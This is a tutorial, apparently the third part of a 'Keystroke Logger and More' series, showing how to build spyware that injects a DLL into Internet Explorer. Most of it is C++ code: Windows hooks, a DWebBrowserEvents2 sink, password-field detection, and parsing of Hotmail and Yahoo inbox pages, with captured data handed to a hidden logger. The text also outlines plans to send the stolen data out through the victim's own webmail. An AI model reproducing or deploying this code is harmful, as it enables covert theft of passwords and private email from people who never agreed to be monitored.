Keystroke Logger and More, Part 3

   

Environment: VC6+SP5 or 7, Win 2K/XP/2003 ONLY!, MS PlatformSDK, Microsoft XML Parser (MSXML)

Note: This is the third article of “KeyStroke Logger and More” series. For consistency, it is highly recommended that you read the first and second article of this series before continuing this one. To fully experiment with the functionality of the logger, you must be using an active Internet connection, and own an e-mail account on www.hotmail.com and www.yahoo.com to see the interception of an on-line e-mail system.

Part 4—It Is Time for IE

IE Hook In A Nut Shell

After you read the first two articles, I assumed you have been at home with the mechanism of hooking under the GUI Windows environment and the inter process communication already. Whether you hook into a password edit box or into MSN Messenger, the basic idea is to inject your DLL into the target process, and interact with the windows residing in that thread (it is rare that GUI windows resides in multiple threads in a real-world application, although you can do that if you like if you do not care about the chore of thread message redirection).

When you plan to hook into MS Internet Explorer (IE), you will find the previous method will not work at all because MS wraps the browser tightly into a COM objects collections called MSHTML (DHTML or whatever; I do not care); to the outside, these objects only expose a few dozen COM interfaces. One of my previous articles, “Super Password Spy++” (Jan 2003, www.CodeGuru.com), introduced a tool with which a user could peek into the password area inside an IE page plus a common password edit box. Because it is a tool for humans, the user takes care of using their mouse to locate the password area. But, to a logger running in the background, you have little chance of counting on the guy telling your logger where the password area is. So, the logger must at least do the following to work correctly on IE hook monitoring:

  1. Find any running IE instance (actually, all Web browsers contain an “Internet Explorer_Server” window; it may be inside Outlook Express, for example).
  2. Inject your DLL into each IE instance (same thread) once and only once (refer the first article for “why”).
  3. Obtain a DHTML COM interface pointer from the IE window handle. There are two steps: First, from the window handle to IHTMLDocument2; and then, from the latter to IWebBrowser2.
  4. Advise your IDispach-based interface to the DHTML DWebBrowserEvents connection point2 to get notification (event) from IE. This is the core of all our work here. Without knowing the time that IE navigates to other URL, how could you get information from IE dynamically? Do not tell me you want to count on polling; it will definitely consume terrible CPU time (causing a perceivable performance hit) and will lead to IE GP crashing ABSOLUTELY at some time point due to an unsolvable synchronization problem by polling.
  5. Whenever, before IE navigates to a new URL. Parse the page with the DHTML hierarchy.
  6. Correctly handle the outdated COM pointer. Release the old one and make a fresh pointer.
    1. If the password area is available inside the page, read the nearby HTML element just as we did to the password edit box in the first article.
    2. If the URL is of on-line mail pages, parse the page. It is somewhat a psychology plus engineering problem—You have to guess the thinking pattern of these Web page developers and follow them in the parsing… no panacea here.
    3. If the URL is of any interesting pre-defined site, dump the page.
  7. Inter-process communication, Transfer data to logger, Special care on any memory management (ex. buffer size check) and exception handling.
    1. If 7b is true, re-use the on-line mail system, transfer intercepted data outside (see consecutive article in this series)
    2. If 7c is true, more effort is needed to parse certain URL and transfer data
  8. Handle exit gracefully, release COM pointer

Among all steps, Steps 4, 6, 7b, 8, and 9a are very crucial and error prone. Let’s preview these steps one by one:

Steps 1 and 2 are not big deals, and you could find answers at home if you read thru my first two articles for it is so similar to them, just this time you hook “Internet Explorer_Server” instead of “EDIT”, “MSNMSBLClass”, or whatever. And you could find how to perform Step 3 in my article “Super Password Spy++” and C++ Q/A June 2001 MSDN Magazine. Step 4 requires you to derive a class from IDispatch in C++ or you choose to use a structure to mimic Vtable of IDispatch in plain C, and I choose the former for less coding lines in C++, but you can still use the latter way. From a technique aspect, they are the same.

Step 5 is not difficult in theory. In one word, you enumerate the whole DHTML hierarchy on the page, and search for some pre-defined keyword. As with Step 4, the problem is that MSDN’s help on this field is not clear, or rather, too succinct and not much in the way of a C++ sample (actually, most are script code samples). Step 6 sounds hackneyed, but you will soon find the pain of controlling something that you are out of control. I bet unless you are a member of a MS IE development team, your should-be-ok code will fail miserably at first—the pointer points to an invalid address while in the previous loop they work great, and the target IE crashes, naturally, because your pointer plays fire inside its process space. More annoying problems pop their ugly heads one by one. Some pages are so huge that you must check every memory copy to ensure your logger does not screw up the remote processes…

When you reach Step 7, you also need some sense on choosing the page elements from the HTML page sea. In this article I pick up only www.hotmail.com and www.yahoo.com as our interception samples of an on-line mail system. MS seems to be managing and developing their global MSN network more systematically—that is, a Hotmail account page initialized by American and Japanese users are the same layout. Note, I am not saying all languages’ Hotmail pages are the same. As a result, our code example runs well on various countries’ MSN local pages. Yahoo!, on the other hand, seems to put the pages’ development work on an individual country’s Yahoo! son company. Take an example, the Yahoo! mail login page is “http://mail.yahoo.com/?.intl=*(Note: I use the DOS-like wildcards * and ? in URLs to stand for garbage characters) when you use www.yahoo.com, whereas its Japanese counterpart is “http://mail.yahoo.co.jp/*“.

If this still makes some sense, the continuing story is really funny. The “Inbox” page of US yahoo is “http://*.mail.yahoo.com/ym/ShowFolder?rb=Inbox&*“, which at least contains a keyword “Inbox”. Anyway, Yahoo! Japan’s “Inbox” page is “http://jp.*.mail.yahoo.co.jp/ym/login?.rand=*“. Sounds crazier than “Rand,” doesn’t it? The worst thing does not stop here—the two “Inbox” pages’ layout are completely different—different table number, different table call number, and so forth. In the end, the Japanese reader will have to modify my code if they want to apply the program on Yahoo! Japan. But, do not get me wrong. Most of the modification is just changing the URL wildcard name accordingly, changing the DTML element enumeration parameter (for example, the mail list is using six table rows here while maybe five table rows there, so you change the number 6 to 5 in the code and so on), the basic framework will be the same, which is good news.

Step 8 will be mentioned in the code list below when we go through them. Step 9 will be covered in later articles of this series. Step 10 seems to be another example of hackneyed stuff, but I think quite a few people will code like this:

  //Inside the DLL injected into the IE
  CComPtr lpHTMLDocument2;
  //some operation
  lpHTMLDocument2->Release();
  //Oops, you crash IE in the last minute...

The problem is not only the proper usage of CComPtr, but also the latent bug inside ATL smart pointer. Refer to the reference list for more detail. The correct usage is .Release() instead of ->Release(), by the way.

Some Things You Need to Know to Work with the DHTML Model Inside IE

Relationship between DHTML COM object and GUI Windows:

To make coding life a little easier, when coping with the parsing of a special page, I made a small helper program called “HtmlPeeker”. It shows how to enumerate DHTML hierarchy, dump elements, and parse a table cell by cell. It not only helps coding the parser code in my program, but also helps readers understand the code inside the more advanced IE injection DLL (In the real world, a lot of pages, to keep the format or visual effect, use a lot of nested tables, so our task to find the proper cell is a “mission impossible” without this knowledge). The following code shows how to dump some frequently used HTML elements—button, textarea, and combobox:

#pragma warning(disable : 4192)
#pragma warning(disable : 4146)
#import <mshtml.tlb>    //Internet Explorer 4+

#include <Atlbase.h>    //to use CComVariant

//all err-handlers are omitted to save space

//m_pHtmlView is CHtmlView on the left panel

LPDISPATCH pDocument = m_pHtmlView->GetHtmlDocument();
MSHTML::IHTMLDocument2Ptr spHtmlDocument(pDocument);
MSHTML::IHTMLElementCollection *pCollection;
spHtmlDocument->get_all(&pCollection);
long len;
pCollection->get_length(&len);
for(int i = 0; i < len; i++)
{
  LPDISPATCH lpItem = pCollection->item(CComVariant(i),
                                        CComVariant(i));
  //Parse Button, Input, Check, Radio
  MSHTML::IHTMLInputElementPtr lpElement;
  HRESULT hr = lpItem->QueryInterface(&lpElement);
  if(SUCCEEDED(hr))
  {

    _bstr_t name  = lpElement->Getname();
    _bstr_t type  = lpElement->Gettype();
    _bstr_t value = lpElement->Getvalue();
    //I use MFC Framework, so.. make it simple
    CString strName  = (LPTSTR)name;
    CString strType  = (LPTSTR)type;
    CString strValue = (LPTSTR)value;
    CString str      = _T("\r\n") + strName + _T(" $$$ ")
                                  + strType + _T(" $$$ ")
                                  + strValue;
    //Write to right panel.....
    //Free Memory!!!
    ::SysFreeString(name);
    ::SysFreeString(type);
    ::SysFreeString(value);
  }

  //Parse TextArea
  MSHTML::IHTMLTextAreaElementPtr lpArea;
  hr = lpItem->QueryInterface(&lpArea);
  if(SUCCEEDED(hr))
  {
    _bstr_t name  = lpArea->Getname();
    _bstr_t type  = lpArea->Gettype();
    _bstr_t value = lpArea->Getvalue();

    CString strName  = (LPTSTR)name;
    CString strType  = (LPTSTR)type;
    CString strValue = (LPTSTR)value;
    CString str      = _T("\r\n") + strName + _T(" $$$ ")
                                  + strType + _T(" $$$ ")
                                  + strValue;
    //Write to right panel .....
    //Free Memory!!!
    ::SysFreeString(name);
    ::SysFreeString(type);
    ::SysFreeString(value);

  }

  //Parse Combo --
  // NOTE: Sometimes Combo is REALLY WINDOWS inside a page
  MSHTML::IHTMLSelectElementPtr lpCombo;
  hr = lpItem->QueryInterface(&lpCombo);
  if(SUCCEEDED(hr))
  {
    long len;
    lpCombo->get_length(&len);
    CString str = _T("\r\n-->Options Starts\r\n");
    m_pEditView->SendMessage(EM_SETSEL, -1, -1);
    m_pEditView->SendMessage(EM_REPLACESEL, 0,
                             (LPARAM)(LPCTSTR)str);
    for(int i = 0; i < len; i++)
    {
      LPDISPATCH lpItem = lpCombo->item(CComVariant(i),
                                        CComVariant(i));
      MSHTML::IHTMLOptionElementPtr lpOption;
      hr = lpItem->QueryInterface(&lpOption);
      if(SUCCEEDED(hr))
      {
        BSTR name;
        lpOption->get_text(&name);
        _bstr_t value = lpOption->Getvalue();
        VARIANT_BOOL selected;
        lpOption->get_selected(&selected);

        CString strName  = (LPTSTR)name;
        CString strValue = (LPTSTR)value;
        str = _T("\r\n") + strName + _T(" $$$ ")
                         + strValue;
        if(selected == VARIANT_TRUE)
        {
          str += _T("$$$ Selected");
        }
        //Write to right panel .....
        //Free Memory!!!
        ::SysFreeString(name);
        ::SysFreeString(type);
        ::SysFreeString(value);
      }
    }
    str = _T("-->Options Ends\r\n");
    m_pEditView->SendMessage(EM_SETSEL, -1, -1);
    m_pEditView->SendMessage(EM_REPLACESEL, 0,
                                (LPARAM)(LPCTSTR)str);
    }
  }

I will not repeat how to decide whether or not a page contains a password edit box. If you are not familiar with this part of the code, go to my previous article, “Super Password Spy++”, for the code excerpt. Besides, you will find code how to get IHTMLDocument from the Browser Control Window Handle. The following figure shows the infrastructure of IE COM objects:

Figure 3.1: Interaction of MSHTML COM object.

Note: It is somewhat different from the figure of C++ Q/A June 2001 MSDN Magazine.

From this figure, you can find that from any one of these objects, you can get another object through a Windows message or COM object method. Please make sure to read C++ Q/A June 2001 MSDN Magazine and note that I DO NOT think IServiceProvider can help providing the “Document Window Handle” directly as that MSDN C++ Q/A article figure showed, and even if figure is true, IOleWindow must first be queried, then call its GetWindow. In the end, even if it is true, I suspect which window handle you get. For the sake of those developers who are new to MSHTML, here I show you guys two more figures with which I think will help your understanding. The first one is the inside out COM object layout of an IE instance, a typical application using MSHTML. The second is the visual corresponding area of these COM interfaces. Please note again, I cannot draw all interfaces in one picture.

Figure 3.2: Inside out COM Object layout of Internet Explorer

Figure 3.3: Visual Field Corresponding COM Object

You can use the “Ole View” tool to confirm that IWebBrowser2 is derived from IWebBrowserApp, and IWebBrowserApp is derived from IWebBrowser. These redundant interfaces make nothing but a more confusing “Interface Hell” which is more serious than “DLL Hell” nowadays. Plus, IWebBrowser2 seems to contain a status bar and toolbar-related methods, which are just a farce in most cases. If I just use a MS Web control on a dialog, why bother creating the status bar or toolbar? (The fact is these methods just do nothing.) From my experience, I would rather deem IWebBrowser2 as a physical window shared by IHTMLDocument2. (In the above figure, the purple rectangle.) Take the following two figures from SPY++.

Figure 3.4: Windows layout of an IE

Note: Current Page has no Embedded ActiveX

Figure 3.5: Windows layout of a dialog hosting two Web browser, one of them has done navigating.

This is my suggestion to new developers:

  1. First, forget IBrowser and IBrowserApp. All you have is IBrowser2 and IHTMLxxx interface.
  2. Secondly, forget any methods related to the status bar, toolbar, and so on. If you use a Web browser control on a dialog or a form view, create your own bar.
  3. Finally, think that a DHTML document and Web browser use the same GUI window to display to the user.

So, go back these two figures. In IE, the dead IWebBrowserApp responds to IE main window, the class name is “IEFrame”. IWebBrowser2, and IHTMLDocument2 to Windows “Internet Explorer_Server”. One thing, you can not prevent IE from navigating somewhere when launching it. The result is that IWebBrowser2 will navigate somewhere and an inside DTMHL document object will be constructed.

On the other hand, look at the figure showing a dialog hosting two Web browsers. A Web browser does not have a document when it starts up until it navigates to somewhere. KB Q249232 “HOWTO: GetIHTMLDocument2 from a HWND” confirms this by stating “Internet Explorer_Server” is the document window. Note again (I have to ask you to take care again and again because there are too many pitfalls here). IHTMLDocument2 is represented by the “Internet Explorer_Server” window, but NOT ALL “Internet Explorer_Server” windows are an IHTMLDocument2 embodiment!!! Go to online MSDN and use “shell docobject view” as the search word; you can find an article called A View of Internals” extracted from “Instant DHTML Scriptlets” (Wrox 1997). When the article was written, it is IE 4.0 era. It says: In fact, if the page hosts some windowed ActiveX controls, these windows would all be children of the server window of class “Internet Explorer_Server“. I cannot find the “Some ActiveX”, but I can make one scenario: Insert one HTML ATL control into an HTML page, and the windows layout is like the following figure:

Figure 3.6: An IE hosting a page that includes an ATL HTML control. Note that nested “Internet Explorer_Server” (0018115A), which is hosted by Ax.

Browser Event Handling:

Let’s continue with how to use this IHTMLDocument pointer. Just as we hook a password edit box and MSN Messenger, we need a way to be notified when the human user or a embedded script navigates the browser. DHTML provides an event sink interface, DWebBrowserEvents2, to fire some events. When I started to write this program, I tried to use OnSubmit event because I knew that a password element usually resides on a form, and the user sooner or later will push the Submit button to go on. But, after a few tries, I changed my mind, for linking to a form dynamically is not only complicated but also useless with these pages without a form like your Hotmail Inbox page. So, I choose the BeforeNaviagte2 event; this event will be fired before any URL change, and I will filter out to get what URL in which I am interested. I made a simple C++ class, CInterceptEvt, to do the interception work, as in the following:

//Header File 

#include <Exdisp.h>    //to use IWebBrowser2
#include "ComDef.h"
class CInterceptEvt : public IDispatch
{

public:
  // IUnknown
  ULONG __stdcall AddRef();
  ULONG __stdcall Release();
  HRESULT __stdcall QueryInterface(REFIID iid, void** ppv);

  // IDispatch
  HRESULT __stdcall GetTypeInfoCount(UINT* pCountTypeInfo);
  HRESULT __stdcall GetTypeInfo(UINT iTypeInfo, LCID lcid,
                                ITypeInfo** ppITypeInfo);
  HRESULT __stdcall GetIDsOfNames(REFIID riid,
                                  LPOLESTR* rgszNames,
                                  UINT cNames, LCID lcid,
                                  DISPID* rgDispId);
  HRESULT __stdcall Invoke(DISPID dispIdMember, REFIID riid,
                           LCID lcid, WORD wFlags,
                           DISPPARAMS* pDispParams,
                           VARIANT* pVarResult,
                           EXCEPINFO* pExcepInfo,
                           UINT* puArgErr);

private:
  ULONG m_cRef;
  ITypeInfo* m_pTypeInfo;

public:
  // CInterceptEvt will be a global variable in DLL, so here
  // is called only once, which also means you need the C++ run
  // time library for global initialization of a C++ constructor
  CInterceptEvt() : m_cRef(1)
  {
    for(int i =0; i < MAX_BROWSER; i++)
    {
      m_ppBrowser[i] = NULL;
      m_ppConnectionPoint[i] = NULL;
    }
  }
  ~CInterceptEvt() {}
  BOOL Init(void);

  //Connect to individual IE window
  void SetSource(IWebBrowser2Ptr pBrowser, DWORD dwIndex);
  void ExitEvents(DWORD dwIndex);
  void ConnectEvents(DWORD dwIndex);

  IWebBrowser2Ptr m_ppBrowser[MAX_BROWSER];
  IConnectionPoint* m_ppConnectionPoint[MAX_BROWSER];
  DWORD m_dwCookie[MAX_BROWSER];
};

//CPP File
ULONG CInterceptEvt::AddRef()
{
  return ++m_cRef;
}
ULONG CInterceptEvt::Release()
{
  if(--m_cRef != 0) return m_cRef;
  m_pTypeInfo->Release();
  delete this;
  return 0;
}
HRESULT CInterceptEvt::QueryInterface(REFIID riid, void** ppv)
{
  if(riid == IID_IUnknown)
    *ppv = (IUnknown*)this;
  else if(riid == IID_IDispatch)
    *ppv = (IDispatch*)this;
  else
    {
      *ppv = NULL;
      return E_NOINTERFACE;
    }
    AddRef();
    return S_OK;
}

BOOL CInterceptEvt::Init(void)
{
  return TRUE;
}

HRESULT CInterceptEvt::GetTypeInfoCount(
  UINT* pCountTypeInfo)
{
  return S_OK;
}

HRESULT CInterceptEvt::GetTypeInfo(UINT iTypeInfo, LCID lcid,
                                   ITypeInfo** ppITypeInfo)
{
  return S_OK;
}

HRESULT CInterceptEvt::GetIDsOfNames(REFIID riid,
                                     LPOLESTR* rgszNames,
                                     UINT cNames, LCID lcid,
                                     DISPID* rgDispId)
{
  return S_OK;
}
//
void CInterceptEvt::ConnectEvents(DWORD dwIndex)
{
  if(m_ppBrowser[dwIndex] == NULL) return;
  IConnectionPointContainer* pCPContainer;
  // Step 1: Get a pointer to the connection point container
  HRESULT hr = m_ppBrowser[dwIndex]->QueryInterface(I
               ID_IConnectionPointContainer,
               (void**)&pCPContainer);
  if (SUCCEEDED(hr))
  {
    // m_pConnectionPoint is defined like this:
    // IConnectionPoint* m_pConnectionPoint;
    WCHAR strEvent[] = L"{3050f364-98b5-11cf-bb82-00aa00bdce0b}";
    //LPOLESTR = WCHAR = TCHAR here all unicode

    CLSID uuidEvent;
    HRESULT hrEvent = CLSIDFromString(
                      (LPOLESTR)strEvent, &uuidEvent);
    //ASSERT(SUCCEEDED(hrEvent));

  // Step 2: Find the connection point
  hr = pCPContainer->FindConnectionPoint(DIID_DWebBrowserEvents2,
                     &m_ppConnectionPoint[dwIndex]);
if (SUCCEEDED(hr))
{
  // Step 3: If everything goes well, Advise
  hr = m_ppConnectionPoint[dwIndex]->
       Advise(this, &m_dwCookie[dwIndex]);
  if (FAILED(hr)) err-handler;
    pCPContainer->Release();
 return;
}

::ReportErr(_T("ConnectEvents"));
  }
}

void CInterceptEvt::ExitEvents(DWORD dwIndex)
{
  // Step 5: Unadvise
  if (m_ppConnectionPoint[dwIndex])
  {
    HRESULT hr = m_ppConnectionPoint[dwIndex]->
                 Unadvise(m_dwCookie[dwIndex]);
  }
}

void CInterceptEvt::SetSource(IWebBrowser2Ptr pBrowser,
                              DWORD dwIndex)
{
  m_ppBrowser[dwIndex] = pBrowser;
}

HRESULT CInterceptEvt::Invoke(DISPID dispidMember,
                              REFIID riid, LCID lcid, WORD wFlags,
                              DISPPARAMS* pDispParams,
                              VARIANT* pvarResult,
                              EXCEPINFO* pExcepInfo,
                              UINT* puArgErr)
{
if (!pDispParams)
return E_INVALIDARG;
  //I am afraid you have to read MSDN carefully and
  // make some try before coding other events
switch (dispidMember)

{
// The parameters for this DISPID are as follows:
// [0]: Cancel flag               - VT_BYREF|VT_BOOL
// [1]: HTTP headers              - VT_BYREF|VT_VARIANT
// [2]: Address of HTTP POST data - VT_BYREF|VT_VARIANT
// [3]: Target frame name         - VT_BYREF|VT_VARIANT
// [4]: Option flags              - VT_BYREF|VT_VARIANT
// [5]: URL to navigate to        - VT_BYREF|VT_VARIANT
// [6]: An object that evaluates to the top-level or frame
// WebBrowser object corresponding to the event.
// [6]: type = 9 VT_DISPATCH

case DISPID_BEFORENAVIGATE2:
if (pDispParams->cArgs >= 6 &&
    pDispParams->rgvarg[6].vt == VT_DISPATCH)
{
  //Got browser control's interface,
  //make confirmation
  IDispatch *pDispVal = &(*pDispParams->rgvarg[6].pdispVal);
  for(int i = 0; i < MAX_BROWSER; i++)
  {
  //compare these 2 COM interface's IUnknown
  if(m_ppBrowser[i])
  {
    IUnknown* pUnk1;
    IUnknown* pUnk2;
    HRESULT hr1 = m_ppBrowser[i]->QueryInterface(
                  IID_IUnknown,  (void**)&pUnk1);
    HRESULT hr2 = pDispVal->QueryInterface(
                  IID_IUnknown, (void**)&pUnk2);
  if(pUnk1 == pUnk2)
  {
    Trigger(i);
    //Got it, check URL, if within our interest
    //parse HTML page and dump info from it!!!
    break;
  }
  }
  }
  }
break;
default:
break;
  }
  return S_OK;
}

Code, Code, and Code:

Following is the code of the DLL that is injected into the IE process space.

// Forward references
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam,
                          LPARAM lParam);
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam,
                             LPARAM lParam) ;

#pragma data_seg("Shared")
//Post Hook Handle 
HHOOK g_hBrowserPostHook[MAX_BROWSER] = {NULL,...};
//Send Hook Handle
HHOOK g_hBrowserSendHook[MAX_BROWSER] = {NULL,...};
//Tracked Browser
HWND g_hBrowserWnd[MAX_BROWSER] = {NULL,...};
//Tracked Active Browser
//(Which Contents Has Never Been Spied Even Once)
HWND g_hActiveBrowserWnd[MAX_BROWSER] = {NULL,...};
//IHTMLDocument2 pointer. Note: The machine must be running Win2K+
MSHTML::IHTMLDocument2Ptr g_lpHTMLDocument2
  [MAX_BROWSER] = {NULL, ..., NULL};
//IWebBrowser2 pointer
IWebBrowser2Ptr g_lpWeb2[MAX_BROWSER] = {NULL,...};
//Global Event Interceptor Class
CInterceptEvt g_event;
//Tracked Browser Thread
DWORD g_idBrowserThread[MAX_BROWSER] = {0, ..., 0};
//Browser Page State -- Page, PreDefined ...etc
DWORD g_dwBrowserState[MAX_BROWSER] = {0, ..., 0};
#pragma data_seg()
// Instruct the linker to make the Shared section
// readable, writable, and shared.
#pragma comment(linker, "/section:Shared,rws")
// Nonshared variables
HINSTANCE g_hinstDll = NULL;

BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
)
{

switch (ul_reason_for_call)

{

case DLL_PROCESS_ATTACH:
  g_hinstDll = (HINSTANCE)hModule;

break;

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;
}

//The Second Browser Window in the same thread
//Will Not Set A New Hook
BOOL WINAPI InitBrowserLink(HWND hBrowser)
{
  DWORD td = ::GetWindowThreadProcessId(hBrowser, NULL);
  //Check if this thread has been hooked
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_idBrowserThread[i] == td)    //no need to hook

{
  //Set Hook To Previous Value
  DWORD dwIndex = InsertBrowserHwnd(hBrowser);
  if(dwIndex == (UINT)-1) return FALSE;
  g_hBrowserSendHook[dwIndex] = g_hBrowserSendHook[i];
  g_hBrowserPostHook[dwIndex] = g_hBrowserPostHook[i];
  g_idBrowserThread[dwIndex]  = g_idBrowserThread[i];

return TRUE;

}

}

  //First Window On This Thread, Hook It
  DWORD dwIndex = InsertBrowserHwnd(hBrowser);
  if(dwIndex == (UINT)-1) return FALSE;
  g_idBrowserThread[dwIndex] = ::GetWindowThreadProcessId(
                                 hBrowser, NULL);

  // Install the hook on the specified thread
  g_hBrowserSendHook[dwIndex] = SetWindowsHookEx(
                                WH_CALLWNDPROC,
                                (HOOKPROC) CallWndProc,
                                g_hinstDll,
                                g_idBrowserThread[dwIndex]);
  if(g_hBrowserSendHook[dwIndex] == NULL) err-handler;

    g_hBrowserPostHook[dwIndex] = SetWindowsHookEx(
                                  WH_GETMESSAGE, GetMsgProc,
                                  g_hinstDll,
                                  g_idBrowserThread[dwIndex]);
  if(g_hBrowserPostHook[dwIndex] == NULL) err-handler;
  PushActiveBrowser(hBrowser);    //Remember this new guy

return TRUE;
}

BOOL WINAPI ExitBrowserLink(HWND hBrowser)
{
  DWORD dwIndex = QueryBrowserHwndIndex(hBrowser);
  if(dwIndex == (UINT)-1) return FALSE;

  DWORD tid = ::g_idBrowserThread[dwIndex];
  DWORD dwThreadNum = 0;
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_idBrowserThread[i] == tid) dwThreadNum++;

}

  //If the thread is used by other browser, do not unhook it
  if(dwThreadNum > 1)

{
  //release the COM object linked with the browser
  AntiLinkCom(dwIndex);
  g_hBrowserWnd[dwIndex]      = NULL;
  g_hBrowserSendHook[dwIndex] = NULL;
  g_hBrowserPostHook[dwIndex] = NULL;
  g_idBrowserThread[dwIndex]  = 0;

return TRUE;

}

  //the last browser running on the thread ready to quit
  BOOL b = UnhookWindowsHookEx(g_hBrowserSendHook[dwIndex]);
  if(!b)  err-handler;
  UnhookWindowsHookEx(g_hBrowserPostHook[dwIndex]);
  AntiLinkCom(dwIndex);       //unlink the com object
  g_hBrowserWnd[dwIndex]      = NULL;
  g_hBrowserSendHook[dwIndex] = NULL;
  g_hBrowserPostHook[dwIndex] = NULL;
  g_idBrowserThread[dwIndex]  = 0;

return TRUE;
}

DWORD InsertBrowserHwnd(HWND hBrowser)
{
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_hBrowserWnd[i] == NULL)

{
  g_hBrowserWnd[i] = hBrowser;
  return i;

}

}

return (UINT)-1;
}

//Query hBrowser's index in g_hBrowserWnd, NOT used in Service
DWORD QueryBrowserHwndIndex(HWND hBrowser)
{
  if(hBrowser == NULL) return (UINT)-1;
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_hBrowserWnd[i] == hBrowser) return i;

}

return (UINT)-1;
}

//When InitBrowserLink, Set Active Browser, link with event class
BOOL PushActiveBrowser(HWND hBrowser)
{
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_hActiveBrowserWnd[i] == NULL)

{
  g_hActiveBrowserWnd[i] = hBrowser;
  return i;

}

}

return FALSE;
}

//bDelete: If COM link OK, then bDelete = TRUE
HWND PopActiveBrowser(BOOL bDelete)
{
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_hActiveBrowserWnd[i] != NULL)

{
  HWND h = g_hActiveBrowserWnd[i];
  if(bDelete) g_hActiveBrowserWnd[i] = NULL;
    return h;

}

}

return NULL;
}

//Get Hooked Browser Number
DWORD WINAPI GetBrowserArrayNumber()
{
  DWORD dwRet = 0;
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_hBrowserWnd[i]) dwRet++;
}

return dwRet;
}

//Check browser Array State
void WINAPI CheckBrowserArray()
{
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(g_hBrowserWnd[i])

{
  if(IsBrowser(g_hBrowserWnd[i]))

{
  //Do Nothing

}

else

{
  g_hBrowserWnd[i]      = NULL;
  g_hBrowserSendHook[i] = NULL;
  g_hBrowserPostHook[i] = NULL;
  g_idBrowserThread[i]  = 0;

}

}

}

return;
}


//Note: If You Have the Handle of The Browser, Call
//QueryBrowserHwndIndex, First Read the HTML Source, URL ...
//of the browser, Copy To MMF
BOOL WINAPI QueryDocument(DWORD dwIndex, WPARAM dwType)
{
  if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  PostMessage(g_hBrowserWnd[dwIndex],
              WM_QUERY_BROWSER, dwType, 0);

return TRUE;
}

LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{

MSG* msg = (MSG*)lParam;
  //The First Time Browser or Browser's (Same Thread)
  //Window Got Called
  //Link Browser with Event Class,
  //if Link to COM is OK, remove it from Active Array
  if(PopActiveBrowser(FALSE) != NULL)

{
  HWND hWnd = msg->hwnd;

  DWORD tid     = GetWindowThreadProcessId(hWnd, NULL);
  DWORD dwIndex = QueryBrowserHwndIndex(PopActiveBrowser(FALSE));
  if(dwIndex != -1 && tid == ::g_idBrowserThread[dwIndex])

{
  HWND h = PopActiveBrowser(TRUE);
  //inside it, more message cause a re-enter
  LinkCom(dwIndex);

}

}

  //wParam : WM_WPARAM_QUERY_HTML, lParam : not used
  if(msg->message == WM_QUERY_BROWSER)

{
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(msg->hwnd == ::g_hBrowserWnd[i] &&
     msg->hwnd != NULL)

{

if(g_lpHTMLDocument2[i] == NULL)

::LinkCom(i);
  //get COM document pointer OK

if(g_lpHTMLDocument2[i] != NULL)

{
  InterQueryDocument(i, msg->wParam);

}

}

}

}

  //find the hook index
  HWND hWnd     = msg->hwnd;
  DWORD dwIndex = -1;
  DWORD tid     = GetWindowThreadProcessId(hWnd, NULL);

  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(tid == ::g_idBrowserThread[i])

{
  dwIndex = i;

break;

}

}
  if(dwIndex == MAX_BROWSER)    //error ???

return 0;
  return(CallNextHookEx(g_hBrowserPostHook[dwIndex],
  nCode, wParam, lParam));
}

//SendMessage Hook Proc
LRESULT CALLBACK CallWndProc(
int nCode,       // hook code
// If sent by the current thread, it is nonzero; otherwise,
// it is zero.
WPARAM wParam,
LPARAM lParam    // message data
)
{
  CWPSTRUCT * pCwp = (CWPSTRUCT *)lParam;

  //find the hook index ....

  //wParam : WM_WPARAM_CHECK_ISPWD, lParam : not used
  if(pCwp->message == WM_QUERY_BROWSER)

{
  for(int i = 0; i < MAX_BROWSER; i++)

{
  if(pCwp->hwnd == ::g_hBrowserWnd[i] &&
     pCwp->hwnd != NULL)

{

if(g_lpHTMLDocument2[i] == NULL)

::LinkCom(i);

if(g_lpHTMLDocument2[i] != NULL)

{
  if(pCwp->wParam ==  WM_WPARAM_CHECK_ISPWD)

{
  BOOL b   = InterIsPwdBrowser(i);
  DWORD dw = WM_WPARAM_CHECK_ISPWD;
  if(b)
    g_dwBrowserState[i] |= dw;

else
   g_dwBrowserState[i] &= ~dw;

return 0;    //no need passing to hook chain

}
else if(pCwp->wParam == WM_WPARAM_CHECK_ISPREDEF)

{
  //check URL to see whether we are interested in this
  enumPreDefinePage b = InterIsPreDefBrowser(i);
  DWORD dw = WM_WPARAM_CHECK_ISPREDEF;
  if(b != none)
    g_dwBrowserState[i] |= dw;

else
  g_dwBrowserState[i] &= ~dw;

return 0;

}

}

}

}

}

return CallNextHookEx (g_hBrowserSendHook[dwIndex],
                       nCode, wParam, lParam) ;
}


//exposed to users, get whole HTML data
BOOL InterQueryDocument(DWORD dwIndex, WPARAM dwType)
{

if(g_lpHTMLDocument2[dwIndex] == NULL)

{
  LinkCom(dwIndex);

if(g_lpHTMLDocument2[dwIndex] == NULL) return FALSE;

}
  LPVOID pView = NULL;

HANDLE hMMF = OpenFileMapping(FILE_MAP_READ |
                              FILE_MAP_WRITE, FALSE, g_MMF_NAME);

if (hMMF == NULL) err-handler;

HANDLE hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                                 FALSE,g_WRITE_EVENT_MMF_NAME);
if(hWriteEvent == NULL) err-handler;

HANDLE hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                                FALSE,g_READ_EVENT_MMF_NAME);
if(hReadEvent == NULL) err-handler;
  DWORD dwRet = ::WaitForSingleObject(hWriteEvent, MAX_WAIT);
if(dwRet == WAIT_ABANDONED) err;

else if(dwRet == WAIT_TIMEOUT) err;

::ResetEvent(hWriteEvent);

